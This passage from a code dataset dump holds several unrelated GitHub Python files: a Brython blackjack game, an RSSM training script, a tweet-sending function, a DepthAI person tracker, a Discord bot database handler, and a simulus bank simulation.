\"\"\r\nuser_cards.textContent = user_cards_value\r\ndocument <= user_cards\r\n\r\ncomputer_card_label = document.createElement(\"label\")\r\ncomputer_card_label.textContent = \"Carte de l'ordinateur : \"\r\ndocument <= computer_card_label\r\n\r\ncomputer_card = document.createElement(\"label\")\r\ncomputer_card_value = \"\"\r\ncomputer_card.textContent = computer_card_value\r\ndocument <= computer_card\r\n\r\nresult_label = document.createElement(\"label\")\r\ndocument <= result_label\r\n\r\n# Initialise les variables du jeu\r\nuser_cards_list = []\r\ncomputer_cards_list = []\r\nis_game_over = False\r\n\r\n# Fonctions du jeu\r\ndef deal_card():\r\n \"\"\"Retourne une carte aléatoire\"\"\"\r\n cards = [11,2,3,4,5,6,7,8,9,10,10,10,10]\r\n card = random.choice(cards)\r\n return card\r\n\r\ndef calculate_score(cards):\r\n \"\"\"Prend une liste de cartes et retourne le score total\"\"\"\r\n if sum(cards) == 21 and len(cards) == 2:\r\n return 0\r\n if 11 in cards and sum(cards) > 21:\r\n cards.remove(11)\r\n cards.append(1)\r\n return sum(cards)\r\n\r\ndef compare(user_score, computer_score):\r\n \"\"\"Compare les scores de l'utilisateur et de l'ordinateur et retourne un message\"\"\"\r\n if user_score == computer_score:\r\n result_label.textContent = \"Match nul !\"\r\n elif computer_score == 0:\r\n result_label.textContent = \"L'ordinateur a blackjack ! Vous avez perdu.\"\r\n elif user_score == 0:\r\n result_label.textContent = \"Vous avez blackjack ! Vous avez gagné.\"\r\n elif user_score > 21:\r\n result_label.textContent = \"Vous avez dépassé 21 ! Vous avez perdu.\"\r\n elif computer_score > 21:\r\n result_label.textContent = \"L'ordinateur a dépassé 21 ! Vous avez gagné.\"\r\n elif user_score > computer_score:\r\n result_label.textContent = \"Vous avez gagné !\"\r\n else:\r\n result_label.textContent = \"Vous avez perdu.\"\r\n\r\ndef update_labels():\r\n \"\"\"Met à jour les labels avec les cartes et les scores\"\"\"\r\n user_cards.textContent = str(user_cards_list) + \" - Score : \" + str(calculate_score(user_cards_list))\r\n computer_card.textContent = str([computer_cards_list[0]]) + \" - Score : ?\"\r\n\r\ndef end_game():\r\n \"\"\"Termine le jeu\"\"\"\r\n global is_game_over\r\n is_game_over = True\r\n computer_score = calculate_score(computer_cards_list)\r\n computer_card.textContent = str(computer_cards_list) + \" - Score : \" + str(computer_score)\r\n compare(calculate_score(user_cards_list), computer_score)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef play_game():\r\n \"\"\"Fonction principale qui gère le jeu\"\"\"\r\n global user_cards_list, computer_cards_list, is_game_over\r\n \r\n # Donne deux cartes à l'utilisateur et à l'ordinateur\r\nfor i in range(2):\r\n user_cards_list.append(deal_card())\r\n computer_cards_list.append(deal_card())\r\n\r\n# Met à jour les labels\r\nupdate_labels()\r\n\r\n# Boucle principale\r\nwhile not is_game_over:\r\n # Demande à l'utilisateur s'il veut prendre une carte\r\n answer = js.confirm(\"Voulez-vous prendre une carte ?\")\r\n if answer:\r\n user_cards_list.append(deal_card())\r\n update_labels()\r\n user_score = calculate_score(user_cards_list)\r\n if user_score > 21:\r\n end_game()\r\n else:\r\n # L'ordinateur prend des cartes tant que son score est inférieur à 17\r\n while calculate_score(computer_cards_list) < 17:\r\n computer_cards_list.append(deal_card())\r\n update_labels()\r\n\r\n # Termine le jeu\r\n end_game()\r\n\r\n# Affiche le message de fin\r\nresult = result_label.cget(\"text\")\r\njs.alert(result)\r\n\r\n\r\n\r\n# from browser import *\r\n \r\n# output_div = document[\"output\"]\r\n\r\n# output_div.innerHTML = \"test\"\r\n \r\n# def text(ev):\r\n# #output_div = document[\"output\"]\r\n# #output_div.innerHTML = \"test\"\r\n# alert(\"hello!\")\r\n\r\n# document[\"button\"].bind(\"click\",text)","repo_name":"Sharkosss/Big_project_really_near_to_the_end","sub_path":"www/testjeu/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17701609025","text":"import random\n\nimport torch\nfrom tqdm import trange\nfrom functools import partial\nfrom torch.distributions import Normal, kl\nfrom torch.distributions.kl import kl_divergence\nfrom memory import *\nfrom rssm_model import *\n\n\ndef infer(rssm, x, u, r, t, beta=1.0):\n free_nats = torch.ones(1, device=x.device) * 3.0\n e_t = bottle(rssm.encoder, x)\n h_t, s_t = rssm.get_init_state(e_t[0])\n kl_loss, rc_loss, re_loss = 0, 0, 0\n states, priors, posteriors, posterior_samples = [], [], [], []\n for i, a_t in enumerate(torch.unbind(u, dim=0)):\n h_t = rssm.deterministic_state_fwd(h_t, s_t, a_t)\n states.append(h_t)\n priors.append(rssm.state_prior(h_t))\n posteriors.append(rssm.state_posterior(h_t, e_t[i + 1]))\n posterior_samples.append(Normal(*posteriors[-1]).rsample())\n s_t = posterior_samples[-1]\n prior_dist = Normal(*map(torch.stack, zip(*priors)))\n posterior_dist = Normal(*map(torch.stack, zip(*posteriors)))\n states, posterior_samples = map(torch.stack, (states, posterior_samples))\n kld_loss = torch.max(\n kl_divergence(posterior_dist, prior_dist).sum(-1),\n free_nats\n ).mean()\n rew_loss = F.mse_loss(\n bottle(rssm.pred_reward, states, posterior_samples), r, reduction='mean'\n )\n\n loss = (beta * kld_loss + rew_loss)\n loss_info = {\n 'kl': kld_loss.item(),\n 'reward_pred': rew_loss.item()\n }\n return loss, loss_info\n\n\ndef train(memory, rssm, optimizer, device, N=32, H=50, grads=False):\n \"\"\"\n Training implementation as indicated in:\n Learning Latent Dynamics for Planning from Pixels\n arXiv:1811.04551\n\n (a.) The Standard Varioational Bound Method\n using only single step predictions.\n \"\"\"\n batch = memory.sample(N, H, time_first=True)\n x, u, r, t = [torch.tensor(x).float().to(device) for x in batch]\n loss, loss_info = rssm.infer(x, u, r, t)\n optimizer.zero_grad()\n nn.utils.clip_grad_norm_(rssm.parameters(), 1000., norm_type=2)\n loss.backward()\n optimizer.step()\n metrics = {\n 'losses': loss_info\n }\n if grads:\n metrics['grad_norms'] = {\n k: 0 if v.grad is None else v.grad.norm().item()\n for k, v in rssm.named_parameters()\n }\n return metrics\n\n\ndef eval(memory, rssm, optimizer, device, N=32, H=50, beta=1.0, grads=False):\n \"\"\"\n Training implementation as indicated in:\n Learning Latent Dynamics for Planning from Pixels\n arXiv:1811.04551\n\n (a.) The Standard Varioational Bound Method\n using only single step predictions.\n \"\"\"\n with torch.no_grad():\n batch = memory.sample(N, H, time_first=True)\n x, u, r, t = [torch.tensor(x).float().to(device) for x in batch]\n loss, loss_info = rssm.infer(x, u, r, t)\n metrics = {\n 'eval_losses': loss_info\n }\n if grads:\n metrics['grad_norms'] = {\n k: 0 if v.grad is None else v.grad.norm().item()\n for k, v in rssm.named_parameters()\n }\n return metrics\n\n\ndef get_mem_from_dataset(dataset):\n mem = Memory(100)\n roll = []\n for episode in dataset:\n eps = Episode()\n for t, (obs, act, reward) in enumerate(episode):\n terminal = (t == len(episode) - 2)\n eps.append(obs, act, reward, terminal)\n if terminal:\n obs, act, reward = episode[-1]\n eps.terminate(obs)\n break\n roll.append(eps)\n mem.append(roll)\n\n info = {}\n info[\"input_size\"] = obs.shape[0]\n return mem, info\n\n\ndef main():\n # input_size = 3\n # default_tuple = (torch.rand(input_size), torch.zeros(1), 0.5)\n # data_episode = [default_tuple for i in range(80)]\n # dummy_dataset = [data_episode for i in range(50)]\n dataset = load_dataset(\"dataset\")\n random.shuffle(dataset)\n mem, info = get_mem_from_dataset(dataset[:-2])\n input_size = info[\"input_size\"]\n\n eval_mem, _ = get_mem_from_dataset(dataset[-2:])\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n # rssm_model = TrustRecurrentStateSpaceModel(input_size).to(device)\n rssm_model = TrustTFM(input_size).to(device)\n optimizer = torch.optim.Adam(rssm_model.parameters(), lr=1e-5, eps=1e-4)\n res_dir = 'results/'\n metrics = {}\n summary = TensorBoardMetrics(f'{res_dir}/')\n\n for epochs in range(10):\n for _ in trange(100, desc='Iter ', leave=False):\n train_metrics = train(mem, rssm_model.train(), optimizer, device)\n for k, v in flatten_dict(train_metrics).items():\n if k not in metrics.keys():\n metrics[k] = []\n metrics[k].append(v)\n metrics[f'{k}_mean'] = np.array(v).mean()\n summary.update(metrics)\n eval_metrics = eval(eval_mem, rssm_model.eval(), optimizer, device)\n summary.update(eval_metrics)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Radiance-nt/search","sub_path":"predict/trust.py","file_name":"trust.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21259897901","text":"#!/usr/bin/env python\n#\n# Citizen Desk\n#\n\nimport datetime\ntry:\n from citizendesk.feeds.twt.external import newstwister as controller\nexcept:\n controller = None\n\ntry:\n unicode\nexcept:\n unicode = str\n\ntry:\n long\nexcept:\n long = int\n\nfrom bson.objectid import ObjectId\n\nfrom citizendesk.common.utils import get_id_value as _get_id_value\nfrom citizendesk.common.utils import get_boolean as _get_boolean\nfrom citizendesk.common.utils import get_etag as _get_etag\nfrom citizendesk.feeds.twt.send.storage import collection, schema\nfrom citizendesk.feeds.twt.report.storage import collection as collection_reports\nfrom citizendesk.feeds.twt.authorized.storage import collection as collection_authorized\nfrom citizendesk.feeds.twt.report.storage import FEED_TYPE\nfrom citizendesk.feeds.any.report.storage import FIELD_UPDATED\n\n'''\nRequests to send a tweet, incl. a reply to a tweet\n'''\n\ndef do_post_send(db, sender_url, authorized_id, user_id, endpoint_id, tweet_spec, report_id=None):\n '''\n sends (a reply to) a tweet\n after it is sent and received, local=True, and user_id=user_id are set in the report\n '''\n if not controller:\n return (False, 'external controller not available')\n if not db:\n return (False, 'inner application error')\n\n if not authorized_id:\n return (False, 'authorized_id not specified')\n if not user_id:\n return (False, 'user_id not specified')\n if not endpoint_id:\n return (False, 'endpoint_id not specified')\n\n if type(tweet_spec) is not dict:\n return (False, 'unknown form of tweet spec')\n if ('message' not in tweet_spec) or (not tweet_spec['message']):\n return (False, 'message text not provided')\n\n follow_part = []\n tweet_data = {\n 'endpoint_id': endpoint_id,\n 'status': tweet_spec['message'],\n 'filter': {},\n }\n\n if ('sensitive' in tweet_spec) and (tweet_spec['sensitive'] is not None):\n sensitive = _get_boolean(tweet_spec['sensitive'])\n if sensitive:\n tweet_data['possibly_sensitive'] = 'true'\n\n if ('display_coordinates' in tweet_spec) and (tweet_spec['display_coordinates'] is not None):\n display_coordinates = _get_boolean(tweet_spec['display_coordinates'])\n if display_coordinates:\n tweet_data['display_coordinates'] = 'true'\n else:\n tweet_data['display_coordinates'] = 'false'\n\n for key in ['lat', 'long', 'place_id']:\n if (key in tweet_spec) and (tweet_spec[key]):\n try:\n tweet_data[key] = str(tweet_spec[key])\n except:\n return (False, 'wrong \"' + str(key) + '\" part in tweet spec')\n\n if report_id is not None:\n report_id = _get_id_value(report_id)\n\n search_spec = {'feed_type': FEED_TYPE}\n if type(report_id) is ObjectId:\n search_spec['_id'] = report_id\n else:\n search_spec['report_id'] = report_id\n\n coll = db[collection_reports]\n report = coll.find_one(search_spec)\n if not report:\n return (False, 'specified report not found')\n\n try:\n orig_user_screen_name = str(report['original']['user']['screen_name']).lower()\n if orig_user_screen_name not in follow_part:\n follow_part.append(orig_user_screen_name)\n except:\n return (False, 'can not find the original tweet sender')\n\n check_inclusion = '@' + orig_user_screen_name.lower()\n try:\n if check_inclusion not in tweet_spec['message'].lower():\n return (False, 'mentioning the original tweet sender not found in the tweet text')\n except:\n return (False, 'can not check inclusion of the original tweet sender')\n\n try:\n tweet_data['in_reply_to_status_id'] = str(report['original_id'])\n except:\n return (False, 'can not find id_str of the original tweet')\n\n coll = db[collection_authorized]\n authorized_id = _get_id_value(authorized_id)\n\n authorized_data = coll.find_one({'_id': authorized_id})\n if not authorized_data:\n return (False, 'saved report on the send-tweet not found')\n\n try:\n authorized_spec = {\n 'consumer_key': authorized_data['spec']['app_consumer_key'],\n 'consumer_secret': authorized_data['spec']['app_consumer_secret'],\n 'access_token_key': authorized_data['spec']['authorized_access_token_key'],\n 'access_token_secret': authorized_data['spec']['authorized_access_token_secret'],\n }\n sender_screen_name = str(authorized_data['spec']['screen_name_search'])\n if sender_screen_name not in follow_part:\n follow_part.append(sender_screen_name)\n except Exception as exc:\n return (False, 'authorized info does not contain all the required data: ' + str(exc))\n\n for key in authorized_spec:\n if not authorized_spec[key]:\n return (False, 'the \"' + str(key) + '\" part of authorized info is empty')\n\n tweet_data['filter']['follow'] = follow_part\n\n connector = controller.NewstwisterConnector(sender_url)\n res = connector.send_tweet(authorized_spec, tweet_data)\n if not res[0]:\n err_msg = 'error during send-tweet request dispatching: ' + res[1]\n return (False, err_msg)\n\n ret_envelope = res[1]\n if type(ret_envelope) is not dict:\n return (False, 'unknown form of returned send-tweet data: ' + str(type(ret_envelope)))\n\n if ('status' not in ret_envelope) or (not ret_envelope['status']):\n err_msg = ''\n if ('error' in ret_envelope) and (ret_envelope['error']):\n err_msg = ': ' + str(ret_envelope['error'])\n return (False, 'status not acknowledged in returned send-tweet data' + err_msg)\n if ('data' not in ret_envelope) or (not ret_envelope['data']):\n return (False, 'payload not provided in returned send-tweet data')\n\n ret_data = ret_envelope['data']\n if type(ret_data) is not dict:\n return (False, 'unknown form of returned payload in send-tweet data: ' + str(type(ret_data)))\n\n if 'id_str' not in ret_data:\n return (False, 'returned send-tweet data without tweet identifier')\n\n coll = db[collection_reports]\n saved_tweet = coll.find_one({'original_id': ret_data['id_str']})\n if not saved_tweet:\n return (False, 'saved report on the send-tweet not found')\n\n doc_id = saved_tweet['_id']\n\n saved_update = {\n 'local': True,\n 'user_id': _get_id_value(user_id),\n 'proto': False,\n FIELD_UPDATED: datetime.datetime.utcnow(),\n #'_etag': _get_etag(),\n }\n\n coll.update({'_id': doc_id}, {'$set': saved_update})\n\n return (True, {'_id': doc_id})\n\n","repo_name":"sourcefabric-innovation/citizendesk-core","sub_path":"src/citizendesk/feeds/twt/send/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37443933291","text":"from typing import NamedTuple\n\nimport dm_env\nfrom bsuite.baselines import base\nfrom jax.experimental.stax import (\n Dense,\n FanInConcat,\n Identity,\n serial,\n parallel,\n Relu,\n FanOut,\n)\n\nfrom .modules import DiscardHidden, LSTMCell\nfrom .base import module\n\n\nclass HParams(NamedTuple):\n hidden_size: int = 256\n\n\n@module\ndef Lpg(hparams):\n phi = serial(Dense(16), Dense(1))\n return serial(\n # FanOut(6),\n parallel(Identity, Identity, Identity, Identity, phi, phi),\n FanInConcat(),\n LSTMCell(hparams.hidden_size)[0:2],\n DiscardHidden(),\n Relu,\n FanOut(2),\n parallel(phi, phi),\n )\n\n\nclass A2C(base.Agent):\n def select_action(self, timestep: dm_env.TimeStep) -> base.Action:\n return super().select_action(timestep)\n\n def update(\n self,\n timestep: dm_env.TimeStep,\n action: base.Action,\n new_timestep: dm_env.TimeStep,\n ) -> None:\n return super().update(timestep, action, new_timestep)\n","repo_name":"epignatelli/discovering-reinforcement-learning-algorithms","sub_path":"lpg/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"79"} +{"seq_id":"33476780545","text":"\"\"\"\nLecture 10: While Loops and If-Else in Python\nMomentum Learning\nIntroduction to Python\nM. Bedir Tapkan\n\"\"\"\n\n# while :\n#\t\n\n# ex\nn = 5\nwhile n > 0:\n\tn -= 1\n\tprint(n)\n\n# ex\na = [1, 2, 3]\nwhile a:\n\tprint(a.pop())\n\nn = 5\nwhile n > 0:\n\tn -= 1\n\tif n == 2:\n\t\tcontinue\n\tprint(n)\n\n# while :\n# \t\n# else:\n# \t\n\n#infinite loop\n# while True:\n# \tprint(\"HI!\")\n\n# if-else Statements\n\n# if :\n# \t\n\na = 0\nb = 1\n\nif a < b:\n\tprint(\"Yes, it is smaller!\")\n\nif b > a:\n\tprint(\"No, it is greater!\")\n\nif a and b:\n\tprint(\"Done - and\")\n\nif a or b:\n\tprint(\"Done - or\")\n\nif 'd' in 'Bedir':\n\tprint(\"Done - in it\")\n\n# If the weather is nice I will:\n# \t- Mow the lawn\n# \t- Weed the garden\n# \t- Take the dog for a walk\n# If the weather is not nice then I won't do any of these\n\nif True:\n\ta = 4\n\tb = 2\n\na = 3\nb = 0\nif a > 0:\n\tif b > 0:\n\t\tprint(\"Success!\")\n\telse: \n\t\tprint(\"b just failed!\")\t\nelse:\n\tprint(\"Failure!\")\n\nif a == 1:\n\tprint('One')\nif a == 2:\n\tprint('Two')\nif a == 3:\n\tprint('Three')\n\na = 7\nif a > 5:\n\tprint(\"Yes\")\nelif a < 8:\n\tprint(\"No\")\nelif a == 3:\n\tprint(\"Interesting!\")\nelse:\n\tprint(\"No idea\")\n\n# pass\nif a == 7:\n\tpass\n\nprint('Hey')\n\na = 17\n\nif a > 15:\n\tprint(\"1\")\nelif a > 14:\n\tprint(\"2\")\nelif a > 10: \n\tprint(\"3\")\nelse:\n\tprint('4')","repo_name":"BedirT/Python-Class-2019","sub_path":"AFTER CLASS/L10 - While Loops & If Statements in Python.py","file_name":"L10 - While Loops & If Statements in Python.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3135570977","text":"from typing import Tuple, List\nfrom pathlib import Path\nimport depthai as dai\nimport numpy as np\nimport os\n\n\nclass VisionSystem:\n \"\"\"\n A handler for the entire vision system on the Raspberry Pi for the HeadsUp project.\n \"\"\"\n\n # number of columns in map\n NUM_COLUMNS = 10\n\n # map from IDs to labels\n LABEL_MAP = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\",\n \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\n def __init__(self, pipeline: dai.Pipeline):\n \"\"\"\n Set up the vision system.\n \"\"\"\n self.has_device = False\n\n nnPath = str(\n (Path(__file__).parent / Path('resnet34-ssd1200_openvino_2021.4_5shave.blob')).resolve().absolute())\n\n # Define sources and outputs\n monoLeft = pipeline.create(dai.node.MonoCamera)\n monoRight = pipeline.create(dai.node.MonoCamera)\n stereo = pipeline.create(dai.node.StereoDepth)\n spatialLocationCalculator = pipeline.create(\n dai.node.SpatialLocationCalculator)\n\n camRgb = pipeline.create(dai.node.ColorCamera)\n spatialDetectionNetwork = pipeline.create(\n dai.node.MobileNetSpatialDetectionNetwork)\n objectTracker = pipeline.create(dai.node.ObjectTracker)\n\n xoutDepth = pipeline.create(dai.node.XLinkOut)\n xoutSpatialData = pipeline.create(dai.node.XLinkOut)\n xoutRGB = pipeline.create(dai.node.XLinkOut)\n xinSpatialCalcConfig = pipeline.create(dai.node.XLinkIn)\n\n trackerOut = pipeline.create(dai.node.XLinkOut)\n\n xoutRGB.setStreamName(\"rgb\")\n xoutDepth.setStreamName(\"depth\")\n xoutSpatialData.setStreamName(\"spatialData\")\n xinSpatialCalcConfig.setStreamName(\"spatialCalcConfig\")\n\n trackerOut.setStreamName(\"tracklets\")\n\n # Properties\n monoLeft.setResolution(\n dai.MonoCameraProperties.SensorResolution.THE_400_P)\n monoLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)\n monoRight.setResolution(\n dai.MonoCameraProperties.SensorResolution.THE_400_P)\n monoRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)\n\n camRgb.setPreviewSize(1200, 1200)\n camRgb.setResolution(\n dai.ColorCameraProperties.SensorResolution.THE_1080_P)\n camRgb.setInterleaved(False)\n camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)\n\n stereo.setDefaultProfilePreset(\n dai.node.StereoDepth.PresetMode.HIGH_DENSITY)\n stereo.setLeftRightCheck(True)\n stereo.setSubpixel(False)\n # Align depth map to the perspective of RGB camera, on which inference is done\n stereo.setDepthAlign(dai.CameraBoardSocket.RGB)\n stereo.setOutputSize(monoLeft.getResolutionWidth(),\n monoLeft.getResolutionHeight())\n\n spatialLocationCalculator.inputConfig.setWaitForMessage(False)\n\n spatialDetectionNetwork.setBlobPath(nnPath)\n spatialDetectionNetwork.setConfidenceThreshold(0.5)\n spatialDetectionNetwork.input.setBlocking(False)\n spatialDetectionNetwork.setBoundingBoxScaleFactor(0.5)\n spatialDetectionNetwork.setDepthLowerThreshold(100)\n spatialDetectionNetwork.setDepthUpperThreshold(5000)\n\n objectTracker.setDetectionLabelsToTrack([15]) # track only person\n # possible tracking types: ZERO_TERM_COLOR_HISTOGRAM, ZERO_TERM_IMAGELESS, SHORT_TERM_IMAGELESS, SHORT_TERM_KCF\n objectTracker.setTrackerType(dai.TrackerType.ZERO_TERM_COLOR_HISTOGRAM)\n # take the smallest ID when new object is tracked, possible options: SMALLEST_ID, UNIQUE_ID\n objectTracker.setTrackerIdAssignmentPolicy(\n dai.TrackerIdAssignmentPolicy.SMALLEST_ID)\n\n # Linking\n monoLeft.out.link(stereo.left)\n monoRight.out.link(stereo.right)\n\n camRgb.preview.link(spatialDetectionNetwork.input)\n camRgb.preview.link(xoutRGB.input)\n objectTracker.out.link(trackerOut.input)\n spatialDetectionNetwork.passthrough.link(\n objectTracker.inputTrackerFrame)\n\n spatialDetectionNetwork.passthrough.link(\n objectTracker.inputDetectionFrame)\n spatialDetectionNetwork.out.link(objectTracker.inputDetections)\n stereo.depth.link(spatialDetectionNetwork.inputDepth)\n\n spatialLocationCalculator.passthroughDepth.link(xoutDepth.input)\n stereo.depth.link(spatialLocationCalculator.inputDepth)\n\n spatialLocationCalculator.out.link(xoutSpatialData.input)\n xinSpatialCalcConfig.out.link(spatialLocationCalculator.inputConfig)\n\n for col in range(VisionSystem.NUM_COLUMNS):\n # Set up column configuration\n topLeft = dai.Point2f(col / VisionSystem.NUM_COLUMNS, 0.0)\n bottomRight = dai.Point2f(\n (col + 1) / (VisionSystem.NUM_COLUMNS), 1.0)\n\n cfgdata = dai.SpatialLocationCalculatorConfigData()\n cfgdata.depthThresholds.lowerThreshold = 100\n cfgdata.depthThresholds.upperThreshold = 10000\n cfgdata.roi = dai.Rect(topLeft, bottomRight)\n spatialLocationCalculator.initialConfig.addROI(cfgdata)\n\n def use_device(self, device: dai.Device):\n \"\"\"\n After creating a device, initialize device-dependent parts of the vision system.\n \"\"\"\n # Output queue will be used to get the depth frames from the outputs defined above\n self.rgbQueue = device.getOutputQueue(\n name=\"rgb\", maxSize=4, blocking=False)\n self.depthQueue = device.getOutputQueue(\n name=\"depth\", maxSize=4, blocking=False)\n self.spatialCalcQueue = device.getOutputQueue(\n name=\"spatialData\", maxSize=4, blocking=False)\n self.spatialCalcConfigInQueue = device.getInputQueue(\n \"spatialCalcConfig\")\n # things that are being tracked\n self.tracklets = device.getOutputQueue(\"tracklets\", 4, False)\n\n self.has_device = True\n\n def periodic(self) -> Tuple[np.array, List[Tuple[float, float]]]:\n \"\"\"\n Perform periodic steps associated with the vision system.\n \"\"\"\n if not self.has_device:\n raise RuntimeError(\n \"Vision system was not initialized with `use_device()` - cannot perform periodic()\")\n\n # Blocking call, will wait until a new data has arrived\n depth_ai_frame = self.depthQueue.get()\n rgb_frame = self.rgbQueue.get()\n cv_frame = rgb_frame.getCvFrame()\n\n spatialData = self.spatialCalcQueue.get().getSpatialLocations()\n trackletsData = self.tracklets.get().tracklets\n\n depths = [int(data.spatialCoordinates.z) for data in spatialData]\n rho_theta_pairs = []\n # print(depths)\n os.system('clear')\n for t in trackletsData:\n tracklet_coordinates = np.array([t.spatialCoordinates.x, t.spatialCoordinates.y, t.spatialCoordinates.z])\n rho = np.sqrt(t.spatialCoordinates.x ** 2 + t.spatialCoordinates.z ** 2) # * 0.00328084 (mm to ft)\n theta = -np.arctan2(t.spatialCoordinates.x, t.spatialCoordinates.z) * 180/np.pi\n\n rho_theta_pairs.append((rho, theta))\n # print(f\"({rho}, {theta})\")\n # t.label = f\"({rho}, {theta})\"\n\n # label = VisionSystem.LABEL_MAP[t.label] if t.label < len(\n # VisionSystem.LABEL_MAP) else str(t.label)\n # print(\n # f\"found tracklet {t.id}: {label} at ({t.spatialCoordinates.x:.4}, {t.spatialCoordinates.y:.4}, {t.spatialCoordinates.z:.4})\")\n\n return cv_frame, rho_theta_pairs\n","repo_name":"claytonwramsey/headsup","sub_path":"pi/vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16312226629","text":"import services.serviceDatabase as serviceDatabase \n\nfrom services.serviceLogger import Logger\nfrom settings.settingBot import debug\n\n# Add server to the database\ndef addServer(serverID):\n requestFormat = \"\"\"\n INSERT INTO addon_levelSystem_settings (serverID)\n VALUES (%s);\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][ADD] Adding server to the DB \" + str(serverID))\n \n serviceDatabase.makeRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][ADD] DB error addServer -> \" + str(error))\n\n\n# Delete server from the database\ndef deleteServer(serverID):\n requestFormat = \"\"\"\n DELETE FROM addon_levelSystem_settings\n WHERE serverID = %s;\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][DEL] Deleting server from the DB \" + str(serverID))\n \n serviceDatabase.makeRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][DEL] DB error deleteServer -> \" + str(error))\n\n\n# Get server from the database\ndef getServer(serverID):\n requestFormat = \"\"\"\n SELECT serverID\n FROM addon_levelSystem_settings\n WHERE serverID = %s\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][GET] Getting server from the DB \" + str(serverID))\n \n return serviceDatabase.getInfoRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][GET] DB error getServer -> \" + str(error))\n\n\n# Get all servers from the database\ndef getAllServers():\n requestFormat = \"\"\"\n SELECT serverID\n FROM addon_levelSystem_settings\n \"\"\"\n requestSettings = ()\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][GET] Getting all servers from the DB\")\n \n return serviceDatabase.getInfoRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][GET] DB error getAllServers -> \" + str(error))\n\n\n# Set channel id for the addon in the database\ndef setChannelID(serverID, channelID):\n requestFormat = \"\"\"\n UPDATE addon_levelSystem_settings\n SET channelID = %s\n WHERE serverID = %s;\n \"\"\"\n requestSettings = (channelID, serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][SET] Setting channelID to the DB \" + str(serverID) + \" \" + str(channelID))\n \n serviceDatabase.makeRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][SET] DB error setChannelID -> \" + str(error))\n\n\n# Get channel id for the addon from the database\ndef getChannelID(serverID):\n requestFormat = \"\"\"\n SELECT channelID\n FROM addon_levelSystem_settings\n WHERE serverID = %s\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][GET] Getting channelID from the DB \" + str(serverID))\n \n return serviceDatabase.getInfoRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][GET] DB error getChannelID -> \" + str(error))","repo_name":"Ted-18/Bot.Assistant-LevelSystem","sub_path":"LevelSystem/handlers/handlerSettings.py","file_name":"handlerSettings.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"49081284763","text":"\"\"\"This example is modified from the simpy's bank renege example; we\nuse the same settings as simpy so that we can get the same results.\"\"\"\n\nRANDOM_SEED = 42 # random seed for repeatability\nNUM_CUSTOMERS = 5 # total number of customers\nINTV_CUSTOMERS = 10.0 # mean time between new customers\nMEAN_BANK_TIME = 12.0 # mean time in bank for each customer\nMIN_PATIENCE = 1 # min customer patience\nMAX_PATIENCE = 3 # max customer patience\n\nimport simulus\nfrom random import seed, expovariate, uniform\n\ndef source():\n for i in range(NUM_CUSTOMERS):\n sim.process(customer, i)\n sim.sleep(expovariate(1.0/INTV_CUSTOMERS))\n\ndef customer(idx):\n arrive = sim.now\n print('%7.4f Customer%02d: Here I am' % (arrive, idx))\n\n patience = uniform(MIN_PATIENCE, MAX_PATIENCE)\n _, timedout = sim.wait(counter, patience)\n if timedout:\n print('%7.4f Customer%02d: RENEGED after %6.3f' %\n (sim.now, idx, sim.now-arrive))\n else:\n print('%7.4f Customer%02d: Waited %6.3f' %\n (sim.now, idx, sim.now-arrive))\n sim.sleep(expovariate(1.0/MEAN_BANK_TIME))\n print('%7.4f Customer%02d: Finished' % (sim.now, idx))\n counter.release()\n\nprint('Bank renege')\nseed(RANDOM_SEED)\nsim = simulus.simulator()\ncounter = sim.resource()\nsim.process(source)\nsim.run()\n","repo_name":"liuxfiu/simulus","sub_path":"examples/simpy/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"42630551875","text":"from google.cloud import tasks_v2\nimport requests\nimport os\nimport json\nfrom google.cloud 